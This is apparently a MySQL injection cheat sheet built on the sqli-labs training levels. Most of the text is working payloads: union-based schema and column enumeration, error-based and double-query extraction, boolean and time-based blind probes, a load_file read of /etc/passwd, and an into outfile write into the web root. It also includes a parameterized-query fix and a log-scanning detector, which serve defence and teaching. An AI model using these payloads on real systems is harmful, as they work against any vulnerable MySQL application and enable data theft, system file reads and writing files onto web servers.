MySQL injection cheat sheet

Functions commonly used in MySQL injection

database()  returns the current database

current_user()  returns the current user

@@datadir  returns the database data directory

@@version_compile_os  returns the operating system the server was built for

version()  returns the database version

concat_ws(separator, str1, str2)  concatenates strings with a separator

concat_ws(0x3a, version(), user(), database())

group_concat()  concatenates the values of a column with a separator

group_concat([DISTINCT] column_to_concat [ORDER BY sort_column ASC/DESC] [SEPARATOR 'separator'])

group_concat(distinct table_schema)

MySQL comment sequences

#,  -- ,  /* */   (note that -- must be followed by a space)

 

Another error-based injection in MySQL

select * from users where username='admin' and exp(~(select*from (select user())a));

-- output
ERROR 1690 (22003): DOUBLE value is out of range in exp(~((select root@localhost from dual)))

Less-1 example

http://127.0.0.1/sqli/Less-1/?id=1 and exp(~(select*from(select user())a)) --+

-- output
DOUBLE value is out of range in exp(~((select root@localhost from dual)))

 

 

Conventional injection queries

and 0 union select 1, group_concat(distinct table_schema), 3 from information_schema.columns --+   (list databases)

and 0 union select 1, group_concat(distinct table_name), 3 from information_schema.columns where table_schema = <hex of the database name> --+

and 0 union select 1, group_concat(distinct column_name), 3 from information_schema.columns where table_name = <hex of the table name> --+

and 0 union select 1, group_concat(column1, 0x3a, column2), 3 from table_name --+

 

Sqli-Labs

Less-1  string type

http://127.0.0.1/sqli/Less-1/?id=1 and all union select 1,2,3 --+

Less-2  numeric type

http://127.0.0.1/sqli/Less-2/?id=1 and all union select 1,2,3 --+

Less-3/4  string type with parentheses; 3 and 4 differ only in single vs. double quotes.

-- key code
-- Less-3
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";
-- ') closes the parenthesis and the single quote
http://127.0.0.1/sqli/Less-3/?id=-1) union all select 1,2,3--+
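The Less-3 statement above pastes the request parameter straight into the SQL text, which is what lets a value like -1) union ... close the parenthesis and append its own query. The following is an added example, not sqli-labs code: the same concatenation flaw next to its hardened form in Python, using an in-memory SQLite table with constructed rows as a stand-in for the MySQL security.users table (SQLite also treats -- as a comment, so the trailing LIMIT 0,1 is swallowed exactly as in MySQL with --+). The function names and the placeholder-* password values are assumptions of this example.

```python
import sqlite3


def build_demo_db():
    # In-memory SQLite stand-in for the sqli-labs `security.users` table.
    # Rows are constructed for this example; passwords are placeholders.
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "admin", "placeholder-1"), (2, "dumb", "placeholder-2")],
    )
    return conn


def lookup_vulnerable(conn, user_id):
    # Mirrors the Less-3 PHP: the parameter becomes part of the SQL text,
    # so a value ending the parenthesis can append a UNION and comment out LIMIT.
    sql = f"SELECT * FROM users WHERE id=({user_id}) LIMIT 0,1"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, user_id):
    # Hardened form: enforce the expected type first, then bind the value as a
    # parameter. The driver sends it as data, never as SQL syntax, so there is
    # no way for it to close the parenthesis or add a second SELECT.
    try:
        uid = int(user_id)
    except (TypeError, ValueError):
        return []  # reject non-numeric ids outright (log this in real code)
    return conn.execute(
        "SELECT * FROM users WHERE id=(?) LIMIT 0,1", (uid,)
    ).fetchall()


if __name__ == "__main__":
    db = build_demo_db()
    payload = "-1) union all select 1,2,3-- "  # the Less-3 value with --+ decoded
    print("vulnerable:", lookup_vulnerable(db, payload))
    print("hardened:  ", lookup_safe(db, payload))
```

Against the constructed table the vulnerable lookup returns the attacker-chosen row (1, 2, 3) for the Less-3 value, while the hardened lookup returns nothing for it and still returns the admin row for a plain id of 1.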

 

Double-query injection

Sometimes no error is returned; refresh a few more times.

 select concat(0x3a,0x3a,(select version()), 0x3a,0x3a);
-- ::10.0.13-MariaDB::

select concat(0x3a,0x3a,(select version()), 0x3a,0x3a, floor(rand()*2));
-- ::10.0.13-MariaDB::1/0

select concat(0x3a,0x3a,(select version()), 0x3a,0x3a, floor(rand()*2))a from security.users;
-- one line of ::10.0.13-MariaDB::1/0 per row in the table

select concat(0x3a,0x3a,(select version()), 0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a;
-- ::10.0.13-MariaDB::1
-- ::10.0.13-MariaDB::0

select count(*), concat(0x3a,0x3a,(select version()), 0x3a,0x3a, floor(rand(0)*2))a from information_schema.tables group by a;
-- ERROR 1062 (23000): Duplicate entry '::10.0.13-MariaDB::1' for key 'group_key'

-- pattern
union select <column placeholders> from (select count(*), concat(0x3a,0x3a,(<query>),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)b --+

 

Less-5/6

-- Less-5
http://127.0.0.1/sqli/Less-5/?id=1 union select 1,2,3 from (select count(*), concat(0x3a,0x3a,(select version()),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)b --+
-- Less-6
http://127.0.0.1/sqli/Less-6/?id=1" union select 1,2,3 from (select count(*), concat(0x3a,0x3a,(select version()),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)b --+

 

Load_file && into outfile && dumpfile

select * from emails into outfile "/tmp/test.txt";

select * from emails limit 0,1 into dumpfile "test1.txt";

select load_file("/etc/passwd");

Less-7

http://127.0.0.1/sqli/Less-7/?id=1)) union select 1,2,version() into outfile "/srv/www/htdocs/sqli/Less-7/test11.txt"--+

 

Less-8  boolean-based blind injection

http://127.0.0.1/sqli/Less-8/?id=1 and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1), 1, 1))) =101--+

 

Less-9/10  time-based blind injection

In MySQL the sleep() function is normally used to pause the query for a few seconds; where sleep() is not available, benchmark() can be used instead.

General pattern, combined with ascii, substr and if:

 union select if(ascii(substr((<query>),i,1)) > k, sleep(10), null) --+
 and if((select substr((<query>), i, 1))=xxx, sleep(10), null) --+

-- Less-9
 and IF((select substr(table_name, 1, 1) from information_schema.tables where table_schema=database() limit 0,1)=e, sleep(5), null) --+

-- Less-10
" and IF((select substr(table_name, 1, 1) from information_schema.tables where table_schema=database() limit 0,1)=e, sleep(5), null) --+
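Every technique on this page leaves a recognisable trace in the request line: the exp(~(...)) error trick, the floor(rand()*2) duplicate-key trick, into outfile / load_file, and the sleep()/benchmark() delays used for Less-9/10, plus the information_schema lookups and the --+ comment tail they all share. The following is an added example, not part of the original post: a small Python detector that URL-decodes the request target from access-log lines and tags each of those signatures. The log lines are constructed for this example (modelled on the URLs above), the signature names and regexes are my own heuristics, and the normalisation is a single URL decode plus lower-casing.

```python
import re
from urllib.parse import unquote_plus

# Heuristic signatures for the techniques on this page (names are my own).
# Dict order is the order in which tags are reported.
SIGNATURES = {
    "union_select": re.compile(r"union\s+(?:all\s+)?select"),
    "error_exp": re.compile(r"exp\s*\(\s*~"),                     # exp(~(...)) error-based
    "dup_key_rand": re.compile(r"floor\s*\(\s*rand\s*\("),         # floor(rand()*2) group-by trick
    "file_io": re.compile(r"into\s+(?:out|dump)file|load_file\s*\("),
    "time_delay": re.compile(r"\b(?:sleep|benchmark)\s*\("),       # time-based blind
    "char_probe": re.compile(r"ascii\s*\(\s*substr"),              # boolean blind character probe
    "schema_enum": re.compile(r"information_schema\."),
    "comment_tail": re.compile(r"--\s|/\*"),                       # --+ decodes to "-- "
}

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD)\s+(\S+)\s+HTTP/')


def normalize(target):
    # One URL decode (so %20 and + become spaces), whitespace folded, lower-cased.
    decoded = unquote_plus(target)
    return re.sub(r"\s+", " ", decoded).lower()


def classify_target(target):
    # Return the list of signature names that match the decoded request target.
    text = normalize(target)
    return [name for name, rx in SIGNATURES.items() if rx.search(text)]


def scan_log(lines):
    # Return [(line_number, [tags...])] for every line whose request target
    # matches at least one signature.
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        tags = classify_target(match.group(1))
        if tags:
            hits.append((number, tags))
    return hits


# Constructed access-log lines modelled on the Less-1/5/7/8/9 URLs on this page.
SAMPLE_LOG = [
    '127.0.0.1 - - [01/Jan/2024:10:00:01 +0000] "GET /sqli/Less-1/?id=1 HTTP/1.1" 200 1042',
    '127.0.0.1 - - [01/Jan/2024:10:00:02 +0000] "GET /sqli/Less-1/?id=1%20and%20exp(~(select*from(select%20user())a))%20--+ HTTP/1.1" 200 612',
    '127.0.0.1 - - [01/Jan/2024:10:00:03 +0000] "GET /sqli/Less-5/?id=1%20union%20select%201,2,3%20from%20(select%20count(*),%20concat(0x3a,0x3a,(select%20version()),0x3a,0x3a,%20floor(rand()*2))a%20from%20information_schema.columns%20group%20by%20a)b%20--+ HTTP/1.1" 200 598',
    '127.0.0.1 - - [01/Jan/2024:10:00:04 +0000] "GET /sqli/Less-7/?id=1))%20union%20select%201,2,version()%20into%20outfile%20%22/srv/www/htdocs/sqli/Less-7/test11.txt%22--+ HTTP/1.1" 200 480',
    '127.0.0.1 - - [01/Jan/2024:10:00:05 +0000] "GET /sqli/Less-8/?id=1%20and%20(ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),1,1)))=101--+ HTTP/1.1" 200 1042',
    '127.0.0.1 - - [01/Jan/2024:10:00:06 +0000] "GET /sqli/Less-9/?id=1%20and%20IF((select%20substr(table_name,1,1)%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1)=e,%20sleep(5),%20null)%20--+ HTTP/1.1" 200 1042',
    '127.0.0.1 - - [01/Jan/2024:10:00:07 +0000] "GET /static/app.css HTTP/1.1" 200 2210',
]


if __name__ == "__main__":
    for number, tags in scan_log(SAMPLE_LOG):
        print(f"line {number}: {', '.join(tags)}")
```

Two caveats for anyone deploying something like this: access logs carry only the request line, so the POST bodies used in Less-11 to Less-14 are invisible to it and need request-body logging or an in-line filter; and the regexes are deliberately broad (a legitimate parameter containing "sleep(" would fire), so treat a hit as a triage signal and pair it with the response size or status changes that error-based and time-based probes produce.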

 

Less-11/12  POST injection with echoed output, much like Less-1/2.

-- POST data
-- Less-11
uname=1&passwd=1 union select 1,group_concat(distinct table_name) from information_schema.tables where table_schema=database() #

-- Less-12
uname=1&passwd=1") union select 1,group_concat(distinct table_name) from information_schema.tables where table_schema=database() #

 

Less-13/14  POST double-query injection

-- Less-13
uname=1&passwd=1) union select 1,2 from (select count(*), concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 1,1),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)b #
-- Less-14
uname=1&passwd=1" union select 1,2 from (select count(*), concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 1,1),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)b #

 

 

 
